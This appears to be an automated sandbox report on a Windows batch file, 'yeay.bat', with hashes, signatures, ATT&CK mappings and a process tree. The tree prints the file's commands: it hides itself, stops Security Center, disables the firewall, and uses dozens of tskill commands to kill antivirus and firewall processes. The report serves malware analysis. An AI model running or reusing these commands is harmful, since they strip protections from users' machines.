d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a

Analysis

max time kernel
149s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
12-10-2023 10:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yeay.bat
Size

3KB
MD5

c52ea73e0ff610403ce0b53173a55ad7
SHA1

59080dfb6964f2cb71cb3d8ce247b6e714310094
SHA256

d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a
SHA512

f0d33fef150eded146186d1e939527eb8f5a7ecf208edf1eddc63b9ffffa2fe62278f6f890c406754951427090c35e0ca21620638093ee4ac18fb45779a6a25c

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
4584	netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2916	tskill.exe
2916	tskill.exe
4128	tskill.exe
4128	tskill.exe
5044	tskill.exe
5044	tskill.exe
4920	tskill.exe
4920	tskill.exe
2940	tskill.exe
2940	tskill.exe
2996	tskill.exe
2996	tskill.exe
1940	tskill.exe
1940	tskill.exe
4840	tskill.exe
4840	tskill.exe
2980	tskill.exe
2980	tskill.exe
1032	tskill.exe
1032	tskill.exe
2512	tskill.exe
2512	tskill.exe
2080	tskill.exe
2080	tskill.exe
4692	tskill.exe
4692	tskill.exe
3856	tskill.exe
3856	tskill.exe
1448	tskill.exe
1448	tskill.exe
3460	tskill.exe
3460	tskill.exe
2344	tskill.exe
2344	tskill.exe
3928	tskill.exe
3928	tskill.exe
756	tskill.exe
756	tskill.exe
4132	tskill.exe
4132	tskill.exe
3772	tskill.exe
3772	tskill.exe
3620	tskill.exe
3620	tskill.exe
820	tskill.exe
820	tskill.exe
4904	tskill.exe
4904	tskill.exe
3396	tskill.exe
3396	tskill.exe
4860	tskill.exe
4860	tskill.exe
1536	tskill.exe
1536	tskill.exe
3756	tskill.exe
3756	tskill.exe
4000	tskill.exe
4000	tskill.exe
4832	tskill.exe
4832	tskill.exe
1288	tskill.exe
1288	tskill.exe
4864	tskill.exe
4864	tskill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 4424	224	cmd.exe	84
PID 224 wrote to memory of 4424	224	cmd.exe	84
PID 224 wrote to memory of 1596	224	cmd.exe	85
PID 224 wrote to memory of 1596	224	cmd.exe	85
PID 1596 wrote to memory of 3200	1596	net.exe	86
PID 1596 wrote to memory of 3200	1596	net.exe	86
PID 224 wrote to memory of 4584	224	cmd.exe	87
PID 224 wrote to memory of 4584	224	cmd.exe	87
PID 224 wrote to memory of 2916	224	cmd.exe	88
PID 224 wrote to memory of 2916	224	cmd.exe	88
PID 224 wrote to memory of 4128	224	cmd.exe	89
PID 224 wrote to memory of 4128	224	cmd.exe	89
PID 224 wrote to memory of 5044	224	cmd.exe	90
PID 224 wrote to memory of 5044	224	cmd.exe	90
PID 224 wrote to memory of 4920	224	cmd.exe	91
PID 224 wrote to memory of 4920	224	cmd.exe	91
PID 224 wrote to memory of 2940	224	cmd.exe	92
PID 224 wrote to memory of 2940	224	cmd.exe	92
PID 224 wrote to memory of 2996	224	cmd.exe	93
PID 224 wrote to memory of 2996	224	cmd.exe	93
PID 224 wrote to memory of 1940	224	cmd.exe	94
PID 224 wrote to memory of 1940	224	cmd.exe	94
PID 224 wrote to memory of 4840	224	cmd.exe	95
PID 224 wrote to memory of 4840	224	cmd.exe	95
PID 224 wrote to memory of 2980	224	cmd.exe	96
PID 224 wrote to memory of 2980	224	cmd.exe	96
PID 224 wrote to memory of 1032	224	cmd.exe	97
PID 224 wrote to memory of 1032	224	cmd.exe	97
PID 224 wrote to memory of 2512	224	cmd.exe	98
PID 224 wrote to memory of 2512	224	cmd.exe	98
PID 224 wrote to memory of 2080	224	cmd.exe	99
PID 224 wrote to memory of 2080	224	cmd.exe	99
PID 224 wrote to memory of 4692	224	cmd.exe	100
PID 224 wrote to memory of 4692	224	cmd.exe	100
PID 224 wrote to memory of 3856	224	cmd.exe	101
PID 224 wrote to memory of 3856	224	cmd.exe	101
PID 224 wrote to memory of 1448	224	cmd.exe	102
PID 224 wrote to memory of 1448	224	cmd.exe	102
PID 224 wrote to memory of 3460	224	cmd.exe	103
PID 224 wrote to memory of 3460	224	cmd.exe	103
PID 224 wrote to memory of 2344	224	cmd.exe	104
PID 224 wrote to memory of 2344	224	cmd.exe	104
PID 224 wrote to memory of 3928	224	cmd.exe	105
PID 224 wrote to memory of 3928	224	cmd.exe	105
PID 224 wrote to memory of 756	224	cmd.exe	106
PID 224 wrote to memory of 756	224	cmd.exe	106
PID 224 wrote to memory of 4132	224	cmd.exe	107
PID 224 wrote to memory of 4132	224	cmd.exe	107
PID 224 wrote to memory of 3772	224	cmd.exe	108
PID 224 wrote to memory of 3772	224	cmd.exe	108
PID 224 wrote to memory of 3620	224	cmd.exe	109
PID 224 wrote to memory of 3620	224	cmd.exe	109
PID 224 wrote to memory of 820	224	cmd.exe	110
PID 224 wrote to memory of 820	224	cmd.exe	110
PID 224 wrote to memory of 4904	224	cmd.exe	111
PID 224 wrote to memory of 4904	224	cmd.exe	111
PID 224 wrote to memory of 3396	224	cmd.exe	112
PID 224 wrote to memory of 3396	224	cmd.exe	112
PID 224 wrote to memory of 4860	224	cmd.exe	113
PID 224 wrote to memory of 4860	224	cmd.exe	113
PID 224 wrote to memory of 1536	224	cmd.exe	114
PID 224 wrote to memory of 1536	224	cmd.exe	114
PID 224 wrote to memory of 3756	224	cmd.exe	115
PID 224 wrote to memory of 3756	224	cmd.exe	115

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4424	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\yeay.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:224
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\AppData\Local\Temp\yeay.bat
  2⤵
  - Views/modifies file attributes
  PID:4424
- C:\Windows\system32\net.exe
  net stop ΓÇ£Security CenterΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Security CenterΓÇ¥
    3⤵
    PID:3200
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=disable
  2⤵
  - Modifies Windows Firewall
  PID:4584
- C:\Windows\system32\tskill.exe
  tskill /A av*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2916
- C:\Windows\system32\tskill.exe
  tskill /A fire*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4128
- C:\Windows\system32\tskill.exe
  tskill /A anti*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5044
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2940
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2996
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1940
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4840
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2980
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1032
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2512
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2080
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4692
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3856
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1448
- C:\Windows\system32\tskill.exe
  tskill /A OUTPOST
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3460
- C:\Windows\system32\tskill.exe
  tskill /A nv*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2344
- C:\Windows\system32\tskill.exe
  tskill /A nav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3928
- C:\Windows\system32\tskill.exe
  tskill /A F-*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:756
- C:\Windows\system32\tskill.exe
  tskill /A ESAFE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4132
- C:\Windows\system32\tskill.exe
  tskill /A cle
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3772
- C:\Windows\system32\tskill.exe
  tskill /A BLACKICE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3620
- C:\Windows\system32\tskill.exe
  tskill /A def*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:820
- C:\Windows\system32\tskill.exe
  tskill /A kav
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Windows\system32\tskill.exe
  tskill /A kav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3396
- C:\Windows\system32\tskill.exe
  tskill /A avg*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4860
- C:\Windows\system32\tskill.exe
  tskill /A ash*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1536
- C:\Windows\system32\tskill.exe
  tskill /A aswupdsv
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3756
- C:\Windows\system32\tskill.exe
  tskill /A ewid*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4000
- C:\Windows\system32\tskill.exe
  tskill /A guard*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4832
- C:\Windows\system32\tskill.exe
  tskill /A guar*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1288
- C:\Windows\system32\tskill.exe
  tskill /A gcasDt*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4864
- C:\Windows\system32\tskill.exe
  tskill /A msmp*
  2⤵
  PID:1248
- C:\Windows\system32\tskill.exe
  tskill /A mcafe*
  2⤵
  PID:2964
- C:\Windows\system32\tskill.exe
  tskill /A mghtml
  2⤵
  PID:1712
- C:\Windows\system32\tskill.exe
  tskill /A msiexec
  2⤵
  PID:4700
- C:\Windows\system32\tskill.exe
  tskill /A outpost
  2⤵
  PID:5032
- C:\Windows\system32\tskill.exe
  tskill /A isafe
  2⤵
  PID:4848
- C:\Windows\system32\tskill.exe
  tskill /A zapcls
  2⤵
  PID:4676
- C:\Windows\system32\tskill.exe
  tskill /A zauinst
  2⤵
  PID:3680
- C:\Windows\system32\tskill.exe
  tskill /A upd
  2⤵
  PID:3160
- C:\Windows\system32\tskill.exe
  tskill /A zlclien*
  2⤵
  PID:3316
- C:\Windows\system32\tskill.exe
  tskill /A minilog
  2⤵
  PID:2732
- C:\Windows\system32\tskill.exe
  tskill /A cc*
  2⤵
  PID:4404
- C:\Windows\system32\tskill.exe
  tskill /A norton*
  2⤵
  PID:2364
- C:\Windows\system32\tskill.exe
  tskill /A norton au*
  2⤵
  PID:4944
- C:\Windows\system32\tskill.exe
  tskill /A ccc*
  2⤵
  PID:1928
- C:\Windows\system32\tskill.exe
  tskill /A npfmn*
  2⤵
  PID:2216
- C:\Windows\system32\tskill.exe
  tskill /A loge*
  2⤵
  PID:2004
- C:\Windows\system32\tskill.exe
  tskill /A nisum*
  2⤵
  PID:2228
- C:\Windows\system32\tskill.exe
  tskill /A issvc
  2⤵
  PID:3308
- C:\Windows\system32\tskill.exe
  tskill /A tmp*
  2⤵
  PID:2172
- C:\Windows\system32\tskill.exe
  tskill /A tmn*
  2⤵
  PID:4492
- C:\Windows\system32\tskill.exe
  tskill /A pcc*
  2⤵
  PID:1860
- C:\Windows\system32\tskill.exe
  tskill /A cpd*
  2⤵
  PID:4836
- C:\Windows\system32\tskill.exe
  tskill /A pop*
  2⤵
  PID:3904
- C:\Windows\system32\tskill.exe
  tskill /A pav*
  2⤵
  PID:1152
- C:\Windows\system32\tskill.exe
  tskill /A padmincls
  2⤵
  PID:404
- C:\Windows\system32\tskill.exe
  tskill /A panda*
  2⤵
  PID:4668
- C:\Windows\system32\tskill.exe
  tskill /A avsch*
  2⤵
  PID:3256
- C:\Windows\system32\tskill.exe
  tskill /A sche*
  2⤵
  PID:1660
- C:\Windows\system32\tskill.exe
  tskill /A syman*
  2⤵
  PID:1720
- C:\Windows\system32\tskill.exe
  tskill /A virus*
  2⤵
  PID:3656
- C:\Windows\system32\tskill.exe
  tskill /A realmcls
  2⤵
  PID:3916
- C:\Windows\system32\tskill.exe
  tskill /A sweep
  2⤵
  PID:1960
- C:\Windows\system32\tskill.exe
  tskill /A scan*
  2⤵
  PID:1908
- C:\Windows\system32\tskill.exe
  tskill /A ad-*
  2⤵
  PID:2464
- C:\Windows\system32\tskill.exe
  tskill /A safe*
  2⤵
  PID:4160
- C:\Windows\system32\tskill.exe
  tskill /A avas*
  2⤵
  PID:1724
- C:\Windows\system32\tskill.exe
  tskill /A norm*
  2⤵
  PID:3588
- C:\Windows\system32\tskill.exe
  tskill /A offg*
  2⤵
  PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads